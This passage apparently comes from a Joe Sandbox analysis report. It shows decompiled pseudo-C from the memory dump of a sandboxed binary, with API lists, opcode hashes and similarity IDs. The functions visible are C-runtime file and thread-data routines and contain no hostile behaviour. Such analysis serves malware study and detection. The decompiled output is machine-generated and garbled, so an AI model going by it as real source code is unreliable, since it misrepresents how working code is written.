                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											 *_t114 = 0x22;
                                                                        											_push(_t133);
                                                                        											goto L4;
                                                                        										} else {
                                                                        											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                        											 *_t133 =  *_t133 + _t131;
                                                                        											_v12 = _v12 + _t131;
                                                                        											_t120 = _t120 - _t131;
                                                                        											_t134 = _t134 + 0x10;
                                                                        											_v8 = _v8 - _t131;
                                                                        											_t131 = _v20;
                                                                        										}
                                                                        										L39:
                                                                        										__eflags = _t120;
                                                                        									} while (_t120 != 0);
                                                                        									goto L40;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t118 = _t90 | 0xffffffff;
                                                                        						_t90 = _t118 / _a12;
                                                                        						_t125 = _t118 % _a12;
                                                                        						__eflags = _a16 - _t90;
                                                                        						if(_a16 <= _t90) {
                                                                        							goto L13;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					L3:
                                                                        					_t92 = E0040BFC1(_t138);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					 *_t92 = 0x16;
                                                                        					_push(_t131);
                                                                        					goto L4;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3886058894-0
                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t13;
                                                                        				intOrPtr _t28;
                                                                        				void* _t29;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __eflags;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x4214d0);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                        				_t13 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                        					L6:
                                                                        					E0040D6E0(_t22, 0xc);
                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                        					_t26 =  *0x422f18; // 0x422e40
                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                        					E004147A2();
                                                                        				} else {
                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                        					}
                                                                        				}
                                                                        				if(_t28 == 0) {
                                                                        					E0040E79A(_t25, _t26, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t28);
                                                                        			}








                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00414744
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                        • __lock.LIBCMT ref: 00414779
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                        • String ID: @.B
                                                                        • API String ID: 3521780317-470711618
                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				intOrPtr _t19;
                                                                        				void* _t21;
                                                                        				signed int _t22;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t50;
                                                                        
                                                                        				_t37 = __edx;
                                                                        				_push(8);
                                                                        				_push(0x421140);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t39 = _a4;
                                                                        				_t50 = _t39;
                                                                        				_t51 = _t50 != 0;
                                                                        				if(_t50 != 0) {
                                                                        					E0040FB29(_t39);
                                                                        					_v8 = 0;
                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                        					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                        					__eflags = _t16 - 0xffffffff;
                                                                        					if(_t16 == 0xffffffff) {
                                                                        						L6:
                                                                        						_t17 = 0x4227e0;
                                                                        					} else {
                                                                        						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                        						if(_t21 == 0xfffffffe) {
                                                                        							goto L6;
                                                                        						} else {
                                                                        							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                        							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                        						}
                                                                        					}
                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                        					_v8 = 0xfffffffe;
                                                                        					E0040C735(_t39);
                                                                        					_t19 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t27 = E0040BFC1(_t51);
                                                                        					_t40 = 0x16;
                                                                        					 *_t27 = _t40;
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					E0040E744(__edx, _t40, 0);
                                                                        					_t19 = _t40;
                                                                        				}
                                                                        				return E0040E21D(_t19);
                                                                        			}














                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2805327698-0
                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t15;
                                                                        				LONG* _t21;
                                                                        				long _t23;
                                                                        				void* _t31;
                                                                        				LONG* _t33;
                                                                        				void* _t34;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __eflags;
                                                                        				_t29 = __edx;
                                                                        				_t25 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x421490);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                        				_t15 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                        					E0040D6E0(_t25, 0xd);
                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                        					__eflags = _t33 -  *0x422d38; // 0x2031660
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _t33;
                                                                        						if(_t33 != 0) {
                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                        							__eflags = _t23;
                                                                        							if(_t23 == 0) {
                                                                        								__eflags = _t33 - 0x422910;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t33);
                                                                        									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t21 =  *0x422d38; // 0x2031660
                                                                        						 *(_t31 + 0x68) = _t21;
                                                                        						_t33 =  *0x422d38; // 0x2031660
                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                        						InterlockedIncrement(_t33);
                                                                        					}
                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                        					E00414067();
                                                                        				} else {
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        				}
                                                                        				if(_t33 == 0) {
                                                                        					E0040E79A(_t29, _t31, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t33);
                                                                        			}











                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                        • __lock.LIBCMT ref: 00414008
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                        • InterlockedIncrement.KERNEL32(02031660), ref: 00414050
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 4271482742-0
                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00413610() {
                                                                        				signed long long _v12;
                                                                        				signed int _v20;
                                                                        				signed long long _v28;
                                                                        				signed char _t8;
                                                                        
                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                        				if(_t8 == 0) {
                                                                        					L6:
                                                                        					_v20 =  *0x41fb50;
                                                                        					_v28 =  *0x41fb48;
                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                        					asm("fld1");
                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                        					asm("fnstsw ax");
                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                        						return 0;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                        					if(__eax == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_push(0);
                                                                        						return __eax;
                                                                        					}
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                        • API String ID: 1646373207-3105848591
                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t12;
                                                                        				void* _t21;
                                                                        				int _t25;
                                                                        				void* _t30;
                                                                        				int _t32;
                                                                        				char* _t35;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_t35 = _a4;
                                                                        				_t17 = __ecx;
                                                                        				if(_t35 != 0) {
                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                        					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                                                                        					asm("sbb esi, esi");
                                                                        					_t30 =  ~_t12 + 1;
                                                                        					if(_t30 != 0) {
                                                                        						_t12 = GetLastError();
                                                                        						if(_t12 == 0x7a) {
                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                        							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                        							asm("sbb esi, esi");
                                                                        							_t30 =  ~_t12 + 1;
                                                                        						}
                                                                        						if(_t30 != 0) {
                                                                        							_t12 = E00401030();
                                                                        						}
                                                                        					}
                                                                        					return _t12;
                                                                        				} else {
                                                                        					 *__ecx = _t35;
                                                                        					return __eax;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3322701435-0
                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        				intOrPtr _t73;
                                                                        				signed int _t75;
                                                                        				signed int _t81;
                                                                        				char _t82;
                                                                        				signed int _t84;
                                                                        				intOrPtr* _t86;
                                                                        				signed int _t87;
                                                                        				intOrPtr* _t90;
                                                                        				signed int _t92;
                                                                        				signed int _t94;
                                                                        				void* _t96;
                                                                        				signed char _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr _t102;
                                                                        				signed int _t103;
                                                                        				intOrPtr* _t104;
                                                                        				signed int _t111;
                                                                        				signed int _t114;
                                                                        				intOrPtr _t115;
                                                                        
                                                                        				_t105 = __esi;
                                                                        				_t97 = __edx;
                                                                        				_t104 = _a4;
                                                                        				_t87 = 0;
                                                                        				_t121 = _t104;
                                                                        				if(_t104 != 0) {
                                                                        					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                        					__eflags =  *(_t104 + 4);
                                                                        					_v8 = _t70;
                                                                        					if(__eflags < 0) {
                                                                        						 *(_t104 + 4) = 0;
                                                                        					}
                                                                        					_push(1);
                                                                        					_push(_t87);
                                                                        					_push(_t70);
                                                                        					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                        					__eflags = _t71 - _t87;
                                                                        					_v12 = _t71;
                                                                        					if(_t71 < _t87) {
                                                                        						L2:
                                                                        						return _t71 | 0xffffffff;
                                                                        					} else {
                                                                        						_t98 =  *(_t104 + 0xc);
                                                                        						__eflags = _t98 & 0x00000108;
                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                        							_t73 =  *_t104;
                                                                        							_t92 =  *(_t104 + 8);
                                                                        							_push(_t105);
                                                                        							_v16 = _t73 - _t92;
                                                                        							__eflags = _t98 & 0x00000003;
                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                        								__eflags = _t98;
                                                                        								if(__eflags < 0) {
                                                                        									L15:
                                                                        									__eflags = _v12 - _t87;
                                                                        									if(_v12 != _t87) {
                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                        											L40:
                                                                        											_t75 = _v16 + _v12;
                                                                        											__eflags = _t75;
                                                                        											L41:
                                                                        											return _t75;
                                                                        										}
                                                                        										_t99 =  *(_t104 + 4);
                                                                        										__eflags = _t99 - _t87;
                                                                        										if(_t99 != _t87) {
                                                                        											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                        											if(__eflags == 0) {
                                                                        												L39:
                                                                        												_t66 =  &_v12;
                                                                        												 *_t66 = _v12 - _a4;
                                                                        												__eflags =  *_t66;
                                                                        												goto L40;
                                                                        											}
                                                                        											_push(2);
                                                                        											_push(0);
                                                                        											_push(_v8);
                                                                        											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                        											if(__eflags != 0) {
                                                                        												_push(0);
                                                                        												_push(_v12);
                                                                        												_push(_v8);
                                                                        												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                        												__eflags = _t81;
                                                                        												if(_t81 >= 0) {
                                                                        													_t82 = 0x200;
                                                                        													__eflags = _a4 - 0x200;
                                                                        													if(_a4 > 0x200) {
                                                                        														L35:
                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                        														L36:
                                                                        														_a4 = _t82;
                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                        														L37:
                                                                        														if(__eflags != 0) {
                                                                        															_t63 =  &_a4;
                                                                        															 *_t63 = _a4 + 1;
                                                                        															__eflags =  *_t63;
                                                                        														}
                                                                        														goto L39;
                                                                        													}
                                                                        													_t94 =  *(_t104 + 0xc);
                                                                        													__eflags = _t94 & 0x00000008;
                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                        														goto L35;
                                                                        													}
                                                                        													__eflags = _t94 & 0x00000400;
                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L35;
                                                                        												}
                                                                        												L31:
                                                                        												_t75 = _t81 | 0xffffffff;
                                                                        												goto L41;
                                                                        											}
                                                                        											_t84 =  *(_t104 + 8);
                                                                        											_t96 = _a4 + _t84;
                                                                        											while(1) {
                                                                        												__eflags = _t84 - _t96;
                                                                        												if(_t84 >= _t96) {
                                                                        													break;
                                                                        												}
                                                                        												__eflags =  *_t84 - 0xa;
                                                                        												if( *_t84 == 0xa) {
                                                                        													_t44 =  &_a4;
                                                                        													 *_t44 = _a4 + 1;
                                                                        													__eflags =  *_t44;
                                                                        												}
                                                                        												_t84 = _t84 + 1;
                                                                        												__eflags = _t84;
                                                                        											}
                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                        											goto L37;
                                                                        										}
                                                                        										_v16 = _t87;
                                                                        										goto L40;
                                                                        									}
                                                                        									_t75 = _v16;
                                                                        									goto L41;
                                                                        								}
                                                                        								_t81 = E0040BFC1(__eflags);
                                                                        								 *_t81 = 0x16;
                                                                        								goto L31;
                                                                        							}
                                                                        							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t103 = _t92;
                                                                        							__eflags = _t103 - _t73;
                                                                        							if(_t103 >= _t73) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t115 = _t73;
                                                                        							do {
                                                                        								__eflags =  *_t103 - 0xa;
                                                                        								if( *_t103 == 0xa) {
                                                                        									_v16 = _v16 + 1;
                                                                        									_t87 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								_t103 = _t103 + 1;
                                                                        								__eflags = _t103 - _t115;
                                                                        							} while (_t103 < _t115);
                                                                        							goto L15;
                                                                        						}
                                                                        						return _t71 -  *(_t104 + 4);
                                                                        					}
                                                                        				}
                                                                        				_t86 = E0040BFC1(_t121);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				 *_t86 = 0x16;
                                                                        				_t71 = E0040E744(__edx, _t104, __esi);
                                                                        				goto L2;
                                                                        			}































                                                                        APIs
                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                        • __locking.LIBCMT ref: 0040C791
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 2395185920-0
                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t30;
                                                                        				signed int _t31;
                                                                        				signed int _t32;
                                                                        				signed int _t33;
                                                                        				signed int _t35;
                                                                        				signed int _t39;
                                                                        				void* _t42;
                                                                        				intOrPtr _t43;
                                                                        				void* _t45;
                                                                        				signed int _t48;
                                                                        				signed int* _t53;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t57;
                                                                        
                                                                        				_t54 = __ebp;
                                                                        				_t45 = __edx;
                                                                        				_t42 = __ebx;
                                                                        				_t53 = _a4;
                                                                        				if(_t53 == 0) {
                                                                        					L40:
                                                                        					_t31 = _t30 | 0xffffffff;
                                                                        					__eflags = _t31;
                                                                        					return _t31;
                                                                        				} else {
                                                                        					_t43 = _a12;
                                                                        					if(_t43 == 2) {
                                                                        						goto L40;
                                                                        					} else {
                                                                        						_t30 = _t53[0xe];
                                                                        						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                        							goto L40;
                                                                        						} else {
                                                                        							_t48 = _a8;
                                                                        							if(_t53[0x17] != 0x77) {
                                                                        								__eflags = _t43 - 1;
                                                                        								if(_t43 == 1) {
                                                                        									_t48 = _t48 + _t53[0x1a];
                                                                        									__eflags = _t48;
                                                                        								}
                                                                        								__eflags = _t48;
                                                                        								if(_t48 < 0) {
                                                                        									goto L39;
                                                                        								} else {
                                                                        									__eflags = _t53[0x16];
                                                                        									if(__eflags == 0) {
                                                                        										_t33 = _t53[0x1a];
                                                                        										__eflags = _t48 - _t33;
                                                                        										if(_t48 < _t33) {
                                                                        											_t30 = E004054F0(_t42, _t54, _t53);
                                                                        											_t55 = _t55 + 4;
                                                                        											__eflags = _t30;
                                                                        											if(_t30 < 0) {
                                                                        												goto L39;
                                                                        											} else {
                                                                        												goto L27;
                                                                        											}
                                                                        										} else {
                                                                        											_t48 = _t48 - _t33;
                                                                        											L27:
                                                                        											__eflags = _t48;
                                                                        											if(_t48 == 0) {
                                                                        												L38:
                                                                        												return _t53[0x1a];
                                                                        											} else {
                                                                        												__eflags = _t53[0x12];
                                                                        												if(_t53[0x12] != 0) {
                                                                        													L30:
